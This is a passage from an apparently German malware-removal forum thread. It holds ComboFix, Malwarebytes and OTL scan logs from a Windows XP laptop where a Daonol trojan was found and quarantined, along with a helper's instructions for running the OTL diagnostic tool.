2010-06-08 17:01 . 2009-06-15 10:43 78848 ------w- c:\windows\system32\dllcache\telnet.exe
2010-06-08 17:01 . 2009-07-17 19:01 58880 ------w- c:\windows\system32\dllcache\atl.dll
2010-06-08 16:59 . 2009-04-15 14:51 585216 ------w- c:\windows\system32\dllcache\rpcrt4.dll
2010-06-08 16:59 . 2009-05-07 15:15 348672 ------w- c:\windows\system32\dllcache\localspl.dll
2010-06-08 16:59 . 2009-06-25 08:41 56832 ------w- c:\windows\system32\dllcache\secur32.dll
2010-06-08 16:59 . 2009-03-21 14:06 1063424 ------w- c:\windows\system32\dllcache\kernel32.dll
2010-06-08 16:59 . 2009-08-25 09:17 354816 ------w- c:\windows\system32\dllcache\winhttp.dll
2010-06-08 16:59 . 2008-06-12 14:20 956928 ------w- c:\windows\system32\dllcache\msdtctm.dll
2010-06-08 16:59 . 2008-06-12 14:20 91648 ------w- c:\windows\system32\dllcache\mtxoci.dll
2010-06-08 16:59 . 2008-06-12 14:20 66560 ------w- c:\windows\system32\dllcache\mtxclu.dll
2010-06-08 16:59 . 2008-06-12 14:20 58880 ------w- c:\windows\system32\dllcache\msdtclog.dll
2010-06-08 16:59 . 2008-06-12 14:20 161792 ------w- c:\windows\system32\dllcache\msdtcuiu.dll
2010-06-08 16:57 . 2009-06-25 08:41 147456 ------w- c:\windows\system32\dllcache\schannel.dll
2010-06-08 16:57 . 2008-10-23 12:36 286720 ------w- c:\windows\system32\dllcache\gdi32.dll
2010-06-08 16:57 . 2009-07-31 08:02 1372672 ------w- c:\windows\system32\dllcache\msxml6.dll
2010-06-08 16:56 . 2009-07-31 04:32 1172480 ------w- c:\windows\system32\dllcache\msxml3.dll
2010-06-08 16:56 . 2008-10-15 16:35 337408 ------w- c:\windows\system32\dllcache\netapi32.dll
2010-06-08 16:56 . 2008-07-07 20:26 253952 ------w- c:\windows\system32\dllcache\es.dll
2010-06-08 16:56 . 2008-06-24 16:42 74240 ------w- c:\windows\system32\dllcache\mscms.dll
2010-06-08 16:56 . 2010-02-11 12:02 226880 ------w- c:\windows\system32\dllcache\tcpip6.sys
2010-06-08 16:56 . 2008-08-14 10:04 138496 ------w- c:\windows\system32\dllcache\afd.sys
2010-06-08 16:56 . 2008-06-20 17:46 247296 ------w- c:\windows\system32\dllcache\mswsock.dll
2010-06-08 16:56 . 2008-06-20 17:46 147968 ------w- c:\windows\system32\dllcache\dnsapi.dll
2010-06-08 16:56 . 2008-06-20 11:51 361600 ------w- c:\windows\system32\dllcache\tcpip.sys
2010-06-08 16:55 . 2008-06-14 17:37 273024 ------w- c:\windows\system32\dllcache\bthport.sys
2010-06-08 16:55 . 2009-12-24 06:59 177664 ------w- c:\windows\system32\dllcache\wintrust.dll
2010-06-08 16:55 . 2010-01-13 14:00 86528 ------w- c:\windows\system32\dllcache\cabview.dll
2010-06-08 16:50 . 2003-12-14 19:51 159744 ----a-w- c:\windows\system32\igfxres.dll
2010-06-08 15:03 . 2010-06-12 01:37 -------- d-----w- c:\windows\system32\dllcache
2010-06-08 14:38 . 2007-10-29 12:00 13824 ----a-w- c:\windows\system32\irclass.dll
2010-06-08 14:38 . 2007-10-29 12:00 24661 ----a-w- c:\windows\system32\spxcoins.dll
.
(((((((((((((((((((((((((((((((((((( Find3M Bericht ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-06-24 01:20 . 2007-10-29 12:00 84908 ----a-w- c:\windows\system32\perfc007.dat
2010-06-24 01:20 . 2007-10-29 12:00 459050 ----a-w- c:\windows\system32\perfh007.dat
2010-06-23 19:00 . 2010-02-21 12:29 -------- d-----w- c:\programme\TTQV4
2010-06-20 15:19 . 2008-10-10 01:18 -------- d-----w- c:\programme\Sandboxie
2010-06-18 23:28 . 2010-01-05 13:19 -------- d-----w- c:\programme\mapedit1-0-57-3
2010-06-18 11:17 . 2010-06-18 11:17 388096 ----a-r- c:\dokumente und einstellungen\***\Anwendungsdaten\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2010-06-08 17:27 . 2009-12-07 22:42 -------- d-----w- c:\dokumente und einstellungen\***\Anwendungsdaten\GlobalMapper
2010-06-08 14:59 . 2008-08-26 22:38 -------- d-----w- c:\programme\Gemeinsame Dateien\Dienste
2010-06-08 14:57 . 2008-08-26 22:36 23504 ----a-w- c:\windows\system32\emptyregdb.dat
2010-06-08 14:56 . 2008-08-26 22:36 -------- d-----w- c:\programme\Windows Media Connect 2
2010-05-21 22:47 . 2009-12-03 00:30 -------- d-----w- c:\programme\xpdf-302pl4
2010-05-20 23:14 . 2010-05-20 23:14 -------- d-----w- c:\programme\satmap_v2.3.7
2010-05-19 20:48 . 2010-01-30 15:52 -------- d-----w- c:\programme\UnxUtils
2010-05-04 16:48 . 2008-06-18 08:36 841216 ----a-w- c:\windows\system32\wininet.dll
2010-05-04 16:48 . 2008-06-18 08:36 78336 ----a-w- c:\windows\system32\ieencode.dll
2010-05-04 16:48 . 2008-06-18 08:36 17408 ----a-w- c:\windows\system32\corpol.dll
2010-05-02 11:30 . 2008-06-18 08:35 1860480 ----a-w- c:\windows\system32\win32k.sys
2010-04-20 05:29 . 2008-04-14 05:50 285696 ----a-w- c:\windows\system32\atmfd.dll
2010-04-08 15:16 . 2010-04-16 01:00 1711232 ----a-w- c:\windows\system32\BootMan.exe
2010-04-07 19:08 . 2010-04-07 19:08 95872 ----a-w- c:\windows\system32\drivers\epfwtdir.sys
2010-04-07 19:07 . 2010-04-07 19:07 114984 ----a-w- c:\windows\system32\drivers\ehdrv.sys
2010-04-07 19:03 . 2010-04-07 19:03 139192 ----a-w- c:\windows\system32\drivers\eamon.sys
2010-03-30 22:16 . 2010-03-30 22:16 99176 ----a-w- c:\windows\system32\PresentationHostProxy.dll
2010-03-30 22:10 . 2010-03-30 22:10 295264 ----a-w- c:\windows\system32\PresentationHost.exe
2010-01-03 12:42 . 2009-06-12 00:09 0 -c--a-w- c:\programme\lastdir
2009-06-11 22:40 . 2009-06-11 22:13 14243 ----a-w- c:\programme\RenameFiles.log
2009-06-11 21:23 . 2009-06-11 21:23 315392 ----a-w- c:\programme\renamefiles_v2.42_de.exe
2007-11-06 11:22 . 2008-11-06 03:15 49236 ----a-w- c:\programme\fat32format.exe
2007-08-27 09:29 . 2008-10-08 23:06 64751 ----a-w- c:\programme\compare.exe
2007-01-05 10:56 . 2008-10-08 23:14 1296896 ----a-w- c:\programme\COMPAREIT.exe
2007-01-04 13:16 . 2010-03-28 21:54 401408 ----a-w- c:\programme\SmartDisk_FAT32_tool.exe
.
(((((((((((((((((((((((((((( Autostartpunkte der Registrierung ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt.
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SandboxieControl"="c:\programme\Sandboxie\SbieCtrl.exe" [2010-04-17 394984]
"LightScribe Control Panel"="c:\programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe" [2007-10-18 455968]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"PCTVOICE"="pctspk.exe" [2003-02-24 163840]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2003-12-14 155648]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2003-12-14 118784]
"SynTPLpr"="c:\programme\Synaptics\SynTP\SynTPLpr.exe" [2004-10-14 98394]
"SynTPEnh"="c:\programme\Synaptics\SynTP\SynTPEnh.exe" [2004-10-14 688218]
"IntelZeroConfig"="c:\programme\Intel\Wireless\bin\ZCfgSvc.exe" [2007-11-01 995328]
"IntelWireless"="c:\programme\Intel\Wireless\Bin\ifrmewrk.exe" [2007-11-01 1101824]
"Panasonic Hotkey Manager"="c:\programme\Panasonic\Hotkey Appendix\HKEYAPP.EXE" [2007-08-23 976264]
"WSwitch"="c:\programme\Panasonic\WSwitch\WSwitch.exe" [2007-12-19 734568]
"PCinfo"="c:\programme\Panasonic\PCINFO\SetDiag.exe" [2004-01-28 45056]
"NeroFilterCheck"="c:\programme\Gemeinsame Dateien\Ahead\Lib\NeroCheck.exe" [2007-03-01 153136]
"SecurDisc"="c:\programme\Nero\Nero 7\InCD\NBHGui.exe" [2007-06-01 1629744]
"InCD"="c:\programme\Nero\Nero 7\InCD\InCD.exe" [2007-06-01 1057328]
"VirtualCloneDrive"="c:\programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe" [2008-06-29 52168]
"HPDJ Taskbar Utility"="c:\windows\system32\spool\drivers\w32x86\3\hpztsb04.exe" [2001-12-11 196608]
"Adobe Reader Speed Launcher"="c:\programme\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2010-04-04 36272]
"Adobe ARM"="c:\programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe" [2010-03-24 952768]
"egui"="c:\programme\ESET\ESET NOD32 Antivirus\egui.exe" [2010-04-07 2145000]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"ShowDeskFix"="shell32" [X]
"nltide_3"="advpack.dll" [2010-05-04 124928]
"IE7"="advpack.dll" [2010-05-04 124928]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"midi9"=c:\dokume~1\***\LOKALE~1\Temp\org.bak 2yAPFDOFNF

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ autocheck autochk *\0sprestrt

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"%windir%\\system32\\sessmgr.exe"=
"c:\\Programme\\Java\\jre1.6.0_06\\bin\\java.exe"=
"c:\\Programme\\eMule0.49b\\emule.exe"=
"c:\\Programme\\Opera\\opera.exe"=
"c:\\Programme\\Java\\jre1.6.0_06\\launch4j-tmp\\JDownloader.exe"=
"c:\\WINDOWS\\system32\\java.exe"=
"c:\\Programme\\WinSCP\\WinSCP.exe"=

R0 hotcore3;hc3ServiceName;c:\windows\system32\drivers\hotcore3.sys [18.03.2010 04:19 40560]
R1 ehdrv;ehdrv;c:\windows\system32\drivers\ehdrv.sys [07.04.2010 21:07 114984]
R1 epfwtdir;epfwtdir;c:\windows\system32\drivers\epfwtdir.sys [07.04.2010 21:08 95872]
R2 brecal;Panasonic Battery Recalibration Driver;c:\programme\Panasonic\BRECAL\Brecal.sys [28.08.2008 15:10 7168]
R2 ekrn;ESET Service;c:\programme\ESET\ESET NOD32 Antivirus\ekrn.exe [07.04.2010 21:07 810120]
R2 pcinfo;Panasonic PC Info. Viewer Driver;c:\programme\Panasonic\PCINFO\PCINFO.sys [28.08.2008 15:27 7168]
R2 WMDrive;WMDrive;c:\windows\system32\drivers\WMDrive.sys [20.10.2008 13:24 88832]
R3 AVMWAN;AVM NDIS WAN CAPI-Treiber;c:\windows\system32\drivers\avmwan.sys [15.01.2009 19:23 37568]
R3 NewMisc;Panasonic Misc Driver;c:\windows\system32\drivers\newmisc.sys [28.08.2008 14:24 50440]
S3 epmntdrv;epmntdrv;c:\windows\system32\epmntdrv.sys [16.04.2010 03:00 13192]
S3 EuGdiDrv;EuGdiDrv;c:\windows\system32\EuGdiDrv.sys [16.04.2010 03:00 8456]
S3 fpcmbase;AVM ISDN-Controller FRITZ!Card PCMCIA;c:\windows\system32\drivers\fpcmbase.sys [15.01.2009 19:22 441728]
S3 MEMSWEEP2;MEMSWEEP2;\??\c:\windows\system32\4.tmp --> c:\windows\system32\4.tmp [?]
S3 UltraCrypt;UltraCrypt;\??\c:\programme\UltraLeecher\UltraCrypt.sys --> c:\programme\UltraLeecher\UltraCrypt.sys [?]
S3 WinRM;Windows-Remoteverwaltung (WS-Verwaltung);c:\windows\System32\svchost.exe -k WinRM [14.04.2008 07:53 14336]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
WINRM REG_MULTI_SZ WINRM

[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{10880D85-AAD9-4558-ABDC-2AB1552D831F}]
2007-10-18 13:25 451872 ----a-w- c:\programme\Gemeinsame Dateien\LightScribe\LSRunOnce.exe
.
.
------- Zusätzlicher Suchlauf -------
.
uStart Page = hxxp://www.google.de/
TCP: {D9AE09D2-9DAE-46C5-93FE-0DC1FCBB848E} = 217.0.43.161 217.0.43.177
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
HKU-Default-RunOnce-tscuninstall - c:\windows\system32\tscupgrd.exe
AddRemove-hp deskjet 930c series - c:\programme\hp deskjet 930c series\hpfiui.exe

**************************************************************************
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, hxxp://www.gmer.net
Rootkit scan 2010-06-25 23:58
Windows 5.1.2600 Service Pack 3 NTFS

Scanne versteckte Prozesse...
Scanne versteckte Autostarteinträge...
Scanne versteckte Dateien...

Scan erfolgreich abgeschlossen
versteckte Dateien: 0

**************************************************************************
[HKEY_LOCAL_MACHINE\System\ControlSet003\Services\MEMSWEEP2]
"ImagePath"="\??\c:\windows\system32\4.tmp"
.
--------------------- Durch laufende Prozesse gestartete DLLs ---------------------
- - - - - - - > 'winlogon.exe'(784)
c:\windows\system32\netprovcredman.dll
- - - - - - - > 'explorer.exe'(732)
c:\programme\Windows Media Player\wmpband.dll
c:\windows\system32\msi.dll
c:\windows\system32\wpdshserviceobj.dll
c:\programme\WinSCP\DragExt.dll
c:\windows\system32\portabledevicetypes.dll
c:\windows\system32\portabledeviceapi.dll
.
------------------------ Weitere laufende Prozesse ------------------------
.
c:\programme\Intel\Wireless\Bin\S24EvMon.exe
c:\programme\Intel\Wireless\Bin\EvtEng.exe
c:\programme\Nero\Nero 7\InCD\InCDsrv.exe
c:\programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe
c:\programme\Intel\Wireless\Bin\RegSrvc.exe
c:\programme\Sandboxie\SbieSvc.exe
c:\windows\system32\pctspk.exe
.
**************************************************************************
.
Zeit der Fertigstellung: 2010-06-26 00:05:26 - PC wurde neu gestartet
ComboFix-quarantined-files.txt 2010-06-25 22:05

Vor Suchlauf: 8.527.527.936 Bytes frei
Nach Suchlauf: 8.848.887.808 Bytes frei

WindowsXP-KB310994-SP2-Pro-BootDisk-DEU.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

- - End Of File - - 914E63082233DBCC1FC83442D2E4C5E2
Code:
ATTFilter C:\Qoobox\Quarantine\C\DOKUME~1\***\LOKALE~1\Temp\org.bak.vir - Variante von Win32/Daonol.CY Trojaner - Gesäubert durch Löschen - in Quarantäne kopiert [1] |
26.06.2010, 10:07 | #4 |
/// Malware-holic | I see you used Malwarebytes? Please post the log, which can be found under Reports. |
26.06.2010, 11:49 | #5 |
| Looks good too: Malwarebytes works now. Code:
ATTFilter
Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Datenbank Version: 4243

Windows 5.1.2600 Service Pack 3
Internet Explorer 7.0.5730.13

26.06.2010 12:17:43
mbam-log-2010-06-26 (12-17-43).txt

Art des Suchlaufs: Vollständiger Suchlauf (C:\|D:\|)
Durchsuchte Objekte: 282857
Laufzeit: 49 Minute(n), 6 Sekunde(n)

Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 0

Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)

Infizierte Dateien:
(Keine bösartigen Objekte gefunden) |
03.07.2010, 00:28 | #6 |
/// Malware-holic | OTL: system scan with OTL
Download OTL: http://filepony.de/download-otl/
Double-click OTL.exe (Windows 7 and Vista users: right-click, run as administrator)
1. At the top you will find a box labelled Output. Please select Minimal Output
2. Tick "scan all users"
3. Under "Extra Registry" select: "Use Safelist" "LOP Check" "Purity Check"
4. Paste into the text box:
netsvcs
msconfig
safebootminimal
safebootnetwork
activex
drivers32
%ALLUSERSPROFILE%\Application Data\*.
%ALLUSERSPROFILE%\Application Data\*.exe /s
%APPDATA%\*.
%APPDATA%\*.exe /s
%SYSTEMDRIVE%\*.exe
/md5start
userinit.exe
eventlog.dll
scecli.dll
netlogon.dll
cngaudit.dll
ws2ifsl.sys
sceclt.dll
ntelogon.dll
logevent.dll
iaStor.sys
nvstor.sys
atapi.sys
IdeChnDr.sys
viasraid.sys
AGP440.sys
vaxscsi.sys
nvatabus.sys
viamraid.sys
nvata.sys
nvgts.sys
iastorv.sys
ViPrt.sys
eNetHook.dll
ahcix86.sys
KR10N.sys
nvstor32.sys
ahcix86s.sys
/md5stop
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
%systemroot%\*. /mp /s
%systemroot%\system32\*.dll /lockedfiles
CREATERESTOREPOINT
5. Click "Scan"
6. Two reports are created: OTL.Txt Extras.Txt
Please post both |
03.07.2010, 19:22 | #7 |
| Hello, because the causes date back so long, I set the time to 60 days: OTL.txt Code:
ATTFilter
OTL logfile created on: 03.07.2010 17:21:09 - Run 3
OTL by OldTimer - Version 3.2.7.0 Folder = C:\Dokumente und Einstellungen\***\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy

1.014,00 Mb Total Physical Memory | 656,00 Mb Available Physical Memory | 65,00% Memory free
2,00 Gb Paging File | 2,00 Gb Available in Paging File | 87,00% Paging File free
Paging file location(s): c:\pagefile.sys 1524 3048 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Programme
Drive C: | 64,00 Gb Total Space | 29,99 Gb Free Space | 46,85% Space Free | Partition Type: NTFS
Drive D: | 85,02 Gb Total Space | 54,79 Gb Free Space | 64,44% Space Free | Partition Type: FAT32
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: TOUGHBOOK
Current User Name: ***
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: All users
Company Name Whitelist: Off
Skip Microsoft Files: Off
File Age = 60 Days
Output = Minimal

========== Processes (SafeList) ==========

PRC - C:\Dokumente und Einstellungen\***\Desktop\OTL.exe (OldTimer Tools)
PRC - C:\Programme\Secunia\PSI\psi.exe (Secunia)
PRC - C:\Programme\Sandboxie\SbieCtrl.exe (tzuk)
PRC - C:\Programme\Sandboxie\SbieSvc.exe (tzuk)
PRC - C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe (ESET)
PRC - C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe (ESET)
PRC - C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe (Elaborate Bytes AG)
PRC - C:\WINDOWS\explorer.exe (Microsoft Corporation)
PRC - C:\Programme\Panasonic\WSwitch\WSwitch.exe (Matsushita Electric Industrial Co., Ltd.)
PRC - C:\Programme\Intel\Wireless\Bin\EvtEng.exe (Intel Corporation)
PRC - C:\Programme\Intel\Wireless\Bin\ZCfgSvc.exe (Intel Corporation)
PRC - C:\Programme\Intel\Wireless\Bin\iFrmewrk.exe (Intel Corporation)
PRC - C:\Programme\Intel\Wireless\Bin\S24EvMon.exe (Intel Corporation )
PRC - C:\Programme\Intel\Wireless\Bin\RegSrvc.exe (Intel Corporation)
PRC - C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe (Hewlett-Packard Company)
PRC - C:\Programme\Gemeinsame Dateien\LightScribe\LightScribeControlPanel.exe (Hewlett-Packard Company)
PRC - C:\Programme\Panasonic\Hotkey Appendix\hkeyapp.exe (Matsushita Electric Industrial Co., Ltd.)
PRC - C:\Programme\Nero\Nero 7\InCD\NBHGui.exe (Nero AG)
PRC - C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe (Nero AG)
PRC - C:\Programme\Nero\Nero 7\InCD\InCD.exe (Nero AG)
PRC - C:\Programme\Synaptics\SynTP\SynTPLpr.exe (Synaptics, Inc.)
PRC - C:\WINDOWS\system32\pctspk.exe ()
PRC - C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe (HP)

========== Modules (SafeList) ==========

MOD - C:\Dokumente und Einstellungen\***\Desktop\OTL.exe (OldTimer Tools)
MOD - C:\WINDOWS\system32\msscript.ocx (Microsoft Corporation)
MOD - C:\WINDOWS\system32\SynTPFcs.dll (Synaptics, Inc.)

========== Win32 Services (SafeList) ==========

SRV - (SbieSvc) -- C:\Programme\Sandboxie\SbieSvc.exe (tzuk)
SRV - (EhttpSrv) -- C:\Programme\ESET\ESET NOD32 Antivirus\EHttpSrv.exe (ESET)
SRV - (ekrn) -- C:\Programme\ESET\ESET NOD32 Antivirus\ekrn.exe (ESET)
SRV - (EvtEng) Intel(R) -- C:\Programme\Intel\Wireless\Bin\EvtEng.exe (Intel Corporation)
SRV - (S24EventMonitor) Intel(R) -- C:\Programme\Intel\Wireless\Bin\S24EvMon.exe (Intel Corporation )
SRV - (RegSrvc) Intel(R) -- C:\Programme\Intel\Wireless\Bin\RegSrvc.exe (Intel Corporation)
SRV - (LightScribeService) -- C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe (Hewlett-Packard Company)
SRV - (NMIndexingService) -- C:\Programme\Gemeinsame Dateien\Ahead\Lib\NMIndexingService.exe (Nero AG)
SRV - (InCDsrv) -- C:\Programme\Nero\Nero 7\InCD\InCDsrv.exe (Nero AG)

========== Driver Services (SafeList) ==========

DRV - (PSI) -- C:\WINDOWS\system32\drivers\psi_mf.sys (Secunia)
DRV - (SbieDrv) -- C:\Programme\Sandboxie\SbieDrv.sys (tzuk)
DRV - (epfwtdir) -- C:\WINDOWS\system32\drivers\epfwtdir.sys (ESET)
DRV - (ehdrv) -- C:\WINDOWS\system32\drivers\ehdrv.sys (ESET)
DRV - (eamon) -- C:\WINDOWS\system32\drivers\eamon.sys (ESET)
DRV - (epmntdrv) -- C:\WINDOWS\system32\epmntdrv.sys ()
DRV - (EuGdiDrv) -- C:\WINDOWS\system32\EuGdiDrv.sys ()
DRV - (Uim_IM) -- C:\WINDOWS\system32\drivers\Uim_IM.sys (Paragon)
DRV - (UimBus) -- C:\WINDOWS\system32\drivers\UimBus.sys (Windows (R) 2000 DDK provider)
DRV - (hotcore3) -- C:\WINDOWS\system32\DRIVERS\hotcore3.sys (Paragon Software Group)
DRV - (WMDrive) -- C:\WINDOWS\system32\drivers\WMDrive.sys ()
DRV - (VClone) -- C:\WINDOWS\system32\drivers\VClone.sys (Elaborate Bytes AG)
DRV - (ElbyCDIO) -- C:\WINDOWS\system32\drivers\ElbyCDIO.sys (Elaborate Bytes AG)
DRV - (Aspi32) -- C:\WINDOWS\system32\drivers\aspi32.sys (Adaptec)
DRV - (NewMisc) -- C:\WINDOWS\system32\drivers\newmisc.sys (Matsushita Electric Industrial Co., Ltd.)
DRV - (s24trans) -- C:\WINDOWS\system32\drivers\s24trans.sys (Intel Corporation)
DRV - (w29n51) Intel(R) -- C:\WINDOWS\system32\drivers\w29n51.sys (Intel® Corporation)
DRV - (incdrm) -- C:\WINDOWS\system32\drivers\InCDRm.sys (Nero AG)
DRV - (InCDPass) -- C:\WINDOWS\system32\drivers\InCDPass.sys (Nero AG)
DRV - (InCDfs) -- C:\WINDOWS\system32\drivers\InCDfs.sys (Nero AG)
DRV - (SynTP) -- C:\WINDOWS\system32\drivers\SynTP.sys (Synaptics, Inc.)
DRV - (pcinfo) -- C:\Programme\Panasonic\PCINFO\PCINFO.sys (Matsushita Electric Industrial Co., Ltd.)
DRV - (brecal) -- C:\Programme\Panasonic\BRECAL\Brecal.sys (Matsushita Electric Industrial Co., Ltd.)
DRV - (Vmodem) -- C:\WINDOWS\system32\DRIVERS\vmodem.sys (PCTEL, INC.)
DRV - (Vpctcom) -- C:\WINDOWS\system32\DRIVERS\vpctcom.sys (PCtel, Inc.)
DRV - (Ptserial) -- C:\WINDOWS\system32\drivers\ptserial.sys (PCTEL, INC.)
DRV - (Vvoice) -- C:\WINDOWS\system32\DRIVERS\vvoice.sys (PCtel, Inc.)
DRV - (RTL8023) -- C:\WINDOWS\system32\drivers\Rtlnic51.sys (Realtek Semiconductor Corporation )
DRV - (STAC97) Audio Driver (WDM) -- C:\WINDOWS\system32\drivers\stac97.sys (SigmaTel, Inc.)
DRV - (HOTKEY) -- C:\WINDOWS\system32\drivers\HOTKEY.SYS (Matsushita Electric Industrial Co.,Ltd.)
DRV - (fpcmbase) -- C:\WINDOWS\system32\drivers\fpcmbase.sys (AVM GmbH)
DRV - (AVMWAN) -- C:\WINDOWS\system32\drivers\avmwan.sys (AVM GmbH)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com/
IE - HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1957994488-1580818891-842925246-1004\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/
IE - HKU\S-1-5-21-1957994488-1580818891-842925246-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

FF - HKLM\software\mozilla\Thunderbird\Extensions\\eplgTb@eset.com: C:\Programme\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2010.06.14 13:51:58 | 000,000,000 | ---D | M]

[2010.01.31 18:38:38 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\nahd6ha2.default\extensions
[2010.01.31 18:38:44 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\nahd6ha2.default\extensions\yasearch@yandex.ru
[2010.01.31 18:38:39 | 000,000,000 | ---D | M] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Mozilla\Firefox\Profiles\nahd6ha2.default\extensions\yasearch@yandex.ru\chrome\skin\extensions-hacks

O1 HOSTS File: ([2010.06.25 23:58:23 | 000,000,027 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1 localhost
O2 - BHO: (Adobe PDF Link Helper) - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
O2 - BHO: (SSVHelper Class) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.6.0_06\bin\ssv.dll (Sun Microsystems, Inc.)
O4 - HKLM..\Run: [Adobe ARM] C:\Programme\Gemeinsame Dateien\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [egui] C:\Programme\ESET\ESET NOD32 Antivirus\egui.exe (ESET)
O4 - HKLM..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb04.exe (HP)
O4 - HKLM..\Run: [InCD] C:\Programme\Nero\Nero 7\InCD\InCD.exe (Nero AG)
O4 - HKLM..\Run: [IntelWireless] C:\Programme\Intel\Wireless\Bin\ifrmewrk.exe (Intel Corporation)
O4 - HKLM..\Run: [IntelZeroConfig] C:\Programme\Intel\Wireless\bin\ZCfgSvc.exe (Intel Corporation)
O4 - HKLM..\Run: [NeroFilterCheck] C:\Programme\Gemeinsame Dateien\Ahead\Lib\NeroCheck.exe (Nero AG)
O4 - HKLM..\Run: [Panasonic Hotkey Manager] C:\Programme\Panasonic\Hotkey Appendix\hkeyapp.exe (Matsushita Electric Industrial Co., Ltd.)
O4 - HKLM..\Run: [PCinfo] C:\Programme\Panasonic\PCINFO\SetDiag.exe (Matsushita Electric Industrial Co.,Ltd.)
O4 - HKLM..\Run: [PCTVOICE] C:\WINDOWS\System32\pctspk.exe ()
O4 - HKLM..\Run: [SecurDisc] C:\Programme\Nero\Nero 7\InCD\NBHGui.exe (Nero AG)
O4 - HKLM..\Run: [SynTPLpr] C:\Programme\Synaptics\SynTP\SynTPLpr.exe (Synaptics, Inc.)
O4 - HKLM..\Run: [VirtualCloneDrive] C:\Programme\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe (Elaborate Bytes AG)
